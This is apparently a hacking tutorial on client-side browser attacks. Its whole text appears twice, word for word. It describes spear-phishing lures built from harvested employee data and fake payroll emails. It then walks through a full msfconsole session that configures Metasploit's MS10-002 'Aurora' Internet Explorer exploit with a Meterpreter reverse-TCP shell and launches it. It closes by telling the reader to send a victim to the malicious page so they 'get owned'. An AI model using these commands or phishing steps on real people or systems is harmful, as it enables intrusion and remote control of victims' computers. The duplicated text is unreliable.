Note : This tutorial is made for educational purposes only to help you understand how the exploit's can be exploited.
Client-side vulnerabilities are vulnerabilities in client software such as web browsers,
e-mail applications, and media players. Client side exploits are an extremely common form of attack. A typical scenario is an attacker compromises an ecommerce website and then use that website as a proxy to launch attacks on unsuspecting website visitors. Client-side vulnerabilities are especially effective in spear phishing attacks because an attacker can easily choose a set of “targets” (people) and deliver a lure to them via e-mail without knowing anything about their target network configuration. Attackers build sophisticated, convincing e-mails that appear to be from a trusted associate. Victims click on a link in the e-mail and end up at evil.com with the attacker serving up malicious web content from an attack web server to the victim’s workstation. Client-side attacks were the next evolution of attacks after network defenses became more prominent. These attacks target software commonly installed on computers in such programs as web browsers, PDF readers, and Microsoft Office applications. Because these programs are commonly installed on computers out of the box, they are obvious attack vectors for hackers. How many of us have received viruses from a malicious webpage and website? More often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user's web browser.
for example, that you are performing a covert penetration test against a corporate target using social engineering. You decide that sending a phishing email to targeted users will present your best chance of success. You harvest email accounts, names, and phone numbers; browse social-networking sites; and create a list of known employees. Your malicious email instructs the email recipients that payroll information needs to be updated; they need to click a link (a malicious link) in the email to do this. However,as soon as the user clicks the link, the machine is compromised, and you can access the organization’s internal network.If an attacker wants to attack your firewall-protected computer, he will normally be blocked by your firewall. However, if the attacker instead hosts the domain evil.com and entices you to browse to www.evil.com, he now has a communication channel to interact with your computer. He needs to find a vulnerability either in the browser or in a component
that the browser uses to display web content. If the attacker finds such a vulnerability, the firewall is no longer relevant.
Metasploit has many uses and another one we will discuss here is client side expoits. To show the power of how MSF can be used in client side exploitss we will see here.
Exploring the Internet Explorer Aurora Exploit :
The browser exploit of choice here is the Aurora exploit (Microsoft Security Bulletin MS10-002). Aurora was most notoriously used in the attacks against Google and more than 20 other large technology companies. This vulnerability was important for both historical and technical reasons. Although this exploit was released in early 2010, it particularly resonates with us because it took down some major players in the technology industry. It was the first time that a client-side browser based attack had gained such notoriety.
Open msfconsole and We’ll start by using the Aurora Metasploit module and then set our payload.
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or
0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) >
First, notice that the default setting for SRVHOST is 0.0.0.0: This means that the web server will bind to all interfaces. The SRVPORT at , 8080, is the port to which the targeted user needs to connect for the exploit to trigger. We will be using port 80
instead of 8080. Above we set the Server to localhost i.e 127.0.0.1 , Server port to 80 and the URI path to ‘/’ (ROOT).
Now let’s Set Payload :-
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 127.0.0.1 yes The local host to listen on. This must be an address on the local machine or
0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ms10_002_aurora) > set LPORT 31337
LPORT => 31337
msf exploit(ms10_002_aurora) >
we set the Payload to reverse_tcp , the listening server to localhost and the listening Port to 31337.
Now that all is setup, let’s launch the exploit :
msf exploit(ms10_002_aurora) > exploit
Exploit running as background job.
Started reverse handler on 127.0.0.1:31337
Using URL: http://127.0.0.1:80/
Server started.
The malicious web page is sitting on our server (URL: http://127.0.0.1:80/) , Now all you have to do is direct victim to this webpage and if they are running an exploitable version on Windows XP they’ll get owned!
Client-side vulnerabilities are vulnerabilities in client software such as web browsers,
e-mail applications, and media players. Client side exploits are an extremely common form of attack. A typical scenario is an attacker compromises an ecommerce website and then use that website as a proxy to launch attacks on unsuspecting website visitors. Client-side vulnerabilities are especially effective in spear phishing attacks because an attacker can easily choose a set of “targets” (people) and deliver a lure to them via e-mail without knowing anything about their target network configuration. Attackers build sophisticated, convincing e-mails that appear to be from a trusted associate. Victims click on a link in the e-mail and end up at evil.com with the attacker serving up malicious web content from an attack web server to the victim’s workstation. Client-side attacks were the next evolution of attacks after network defenses became more prominent. These attacks target software commonly installed on computers in such programs as web browsers, PDF readers, and Microsoft Office applications. Because these programs are commonly installed on computers out of the box, they are obvious attack vectors for hackers. How many of us have received viruses from a malicious webpage and website? More often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user's web browser.
for example, that you are performing a covert penetration test against a corporate target using social engineering. You decide that sending a phishing email to targeted users will present your best chance of success. You harvest email accounts, names, and phone numbers; browse social-networking sites; and create a list of known employees. Your malicious email instructs the email recipients that payroll information needs to be updated; they need to click a link (a malicious link) in the email to do this. However,as soon as the user clicks the link, the machine is compromised, and you can access the organization’s internal network.If an attacker wants to attack your firewall-protected computer, he will normally be blocked by your firewall. However, if the attacker instead hosts the domain evil.com and entices you to browse to www.evil.com, he now has a communication channel to interact with your computer. He needs to find a vulnerability either in the browser or in a component
that the browser uses to display web content. If the attacker finds such a vulnerability, the firewall is no longer relevant.
Metasploit has many uses and another one we will discuss here is client side expoits. To show the power of how MSF can be used in client side exploitss we will see here.
Exploring the Internet Explorer Aurora Exploit :
The browser exploit of choice here is the Aurora exploit (Microsoft Security Bulletin MS10-002). Aurora was most notoriously used in the attacks against Google and more than 20 other large technology companies. This vulnerability was important for both historical and technical reasons. Although this exploit was released in early 2010, it particularly resonates with us because it took down some major players in the technology industry. It was the first time that a client-side browser based attack had gained such notoriety.
Open msfconsole and We’ll start by using the Aurora Metasploit module and then set our payload.
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or
0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) >
First, notice that the default setting for SRVHOST is 0.0.0.0: This means that the web server will bind to all interfaces. The SRVPORT at , 8080, is the port to which the targeted user needs to connect for the exploit to trigger. We will be using port 80
instead of 8080. Above we set the Server to localhost i.e 127.0.0.1 , Server port to 80 and the URI path to ‘/’ (ROOT).
Now let’s Set Payload :-
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 127.0.0.1 yes The local host to listen on. This must be an address on the local machine or
0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ms10_002_aurora) > set LPORT 31337
LPORT => 31337
msf exploit(ms10_002_aurora) >
we set the Payload to reverse_tcp , the listening server to localhost and the listening Port to 31337.
Now that all is setup, let’s launch the exploit :
msf exploit(ms10_002_aurora) > exploit
Exploit running as background job.
Started reverse handler on 127.0.0.1:31337
Using URL: http://127.0.0.1:80/
Server started.
The malicious web page is sitting on our server (URL: http://127.0.0.1:80/) , Now all you have to do is direct victim to this webpage and if they are running an exploitable version on Windows XP they’ll get owned!
